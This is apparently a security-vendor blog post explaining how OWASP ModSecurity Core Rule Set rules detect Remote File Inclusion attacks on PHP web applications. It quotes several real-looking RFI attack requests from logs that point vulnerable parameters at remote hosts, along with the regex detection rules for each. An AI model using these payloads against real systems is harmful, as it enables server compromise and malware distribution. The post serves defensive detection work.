Remote file inclusion (RFI) is a popular technique used to attack web applications (especially php applications) from a remote server. RFI attacks are extremely dangerous as they allow a client to to force an vulnerable application to run their own malicious code by including a reference pointer to code from a URL located on a remote server. When an application executes the malicious code it may lead to a backdoor exploit or technical information retrieval.
There are two main application vulnerabilities that allow RFI attacks to succeed:
The two main goals for RFI attacks against web servers are:
- Botnet Herding - executing botnet code on the server so that they attacker may use the web server's resources to launch DDoS attacks
- Malware Distribution - the attacker can inject malicious JS code into web pages served to clients that will cause them to be infected with malicious code such as the Zeus Banking Trojan.
From a defensive perspective, how do we detect RFI attacks and block them? We will walk through the various RFI detection mechanism that we have in the
OWASP ModSecurity Core Rule Set.
RFI Detection Challenges
When trying to use a negative security approach for RFI attack you can try to use the following regular expression to search for a signature such as "(ht|f)tps?://" within parameter payloads. This initially seems like a good approach as this would identify the beginning portions of a fully qualified URI. While this is true, this approach will unfortunately result in many false positives due to the following:
- External Links/Redirects - There are request parameters which are used as external link (e.g. - accepts http:// as valid input) that point either back to the local host (WordPress and other apps do this) or legitimately point to a resource on a remote site.
- Free-form Text - There are "free text" request parameters that are prone to false positives. In many cases these parameters contains user input (submission of free text from the user to the application) and in other cases parameter that contains large amount of data (may include URL links that can be false detected as RFI attack).
Example RFI Attack Payload
Trustwave's SpiderLabs Research Team has seen numerous attack vectors (from customer logs and honeypot data samples). We will review various RFI attack payloads we have gathered and describe the detection techniques used.
URL Contains an IP Address
Most legitimate URL referencing is conducted by specifying an actual domain/hostname and as such using an IP address as external link may indicate an attack. A typical attack using an IP address looks like:
GET /page.php?_PHPLIB[libdir]=http://89.238.174.14/fx29id1.txt??? HTTP/1.1
Therefore a rule for detecting such a condition should search for the pattern "(ht|f)tps?:\/\/" followed by an IP address. Here is the CRS rule:
SecRule ARGS "^(?:ht|f)tps?:\/\/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ "phase:2,rev:'2.2.2',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,status:501,msg:'Remote File Inclusion Attack',id:'950117',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.rfi_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}"
Use of PHP Functions
Another technique is to use internal PHP keyword functions such as "include()" to try and trick the application into including data from an external site:
GET /?id={${include("http://www.luomoeillegno.com/extras/idxx.txt??")}} HTTP/1.1
A rule for detecting such a condition should search for "include(" followed by "(ht|f)tps?:\/\/". An example ModSecurity rule to detect this is:
SecRule ARGS "(?:\binclude\s*\([^)]*(ht|f)tps?:\/\/)" \ "phase:2,rev:'2.2.2',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,status:501,msg:'Remote File Inclusion Attack',id:'950118',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.rfi_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}"
URLs with Trailing Question Mark(s)
Appending question marks to the end of the injected RFI payload is a common technique and is somewhat similar to SQL Injection payloads utilizing comment specifiers (--, ;-- or #) at the end of their payloads. The RFI attackers don't know what the remainder of the PHP code that they are going to be included into is supposed to do. So, by adding the "?" character(s), the remainder of the local PHP code is actually treated as a parameter to the RFI included code. The RFI code then simply ignores the legitimate code and only executes its own. A typical attack using a question mark at end looks like:
GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0
A rule for detecting such a condition such an attack should search for "(ft|htt)ps?.*\?$". An example ModSecurity rule to detect it is:
SecRule ARGS "(?:ft|htt)ps?.*\?+$" \ "phase:2,rev:'2.2.2',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,status:501,msg:'Remote File Inclusion Attack',id:'950119',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.rfi_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}"
Off-site URLs
One other technique that can be used to detect potential RFI attacks (when the application never legitimately references files offsite) is to inspect the domain name/hostname specified within the parameter payload and then compare it to the Host header data submitted in the request. If the two items match, then this would allow the normal fully qualified referencing back to the local site while simultaneously deny offsite references.
For example, the following legitimate request would be allowed as the hostnames match:
GET /login.php?redirect=http://www.example.com/privmsg.php&folder=inbox&sid=cc5b71d6f45d94c636e94c27a2942e62 HTTP/1.1Host: www.example.comUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
An RFI attack, however, would have a mismatch between the URL domain and the Host header:
GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://bio.as.nhcue.edu.tw//Bio1/language/lang.txt??? HTTP/1.1Host: www.example.comUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
An example ModSecurity rule to detect it is:
SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \ "chain,phase:2,rev:'2.2.2',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,status:501,msg:'Remote File Inclusion Attack',id:'950120',severity:'2'" SecRule TX:1 "!@beginsWith %{request_headers.host}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.rfi_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{tx.1}"
This rule initially searches for "^(?:ht|f)tps?:\/\/(.*)\?$" which is a URL with a trailing question mark. It will then capture the hostname data within the 2nd parentheses. The 2nd part of this rule then compares the saved capture data with the macro expanded Host header data from the request. If there is a mismatch (meaning the URL is off-site), then the rule matches.
Conclusion
These generic RFI rules could be used individually or collaboratively in an anomaly scoring scenario to help identify these types of attacks. Keep an eye out for more additions to the OWASP CRS for detecting RFI attacks. If you have any other detection techniques, let us know.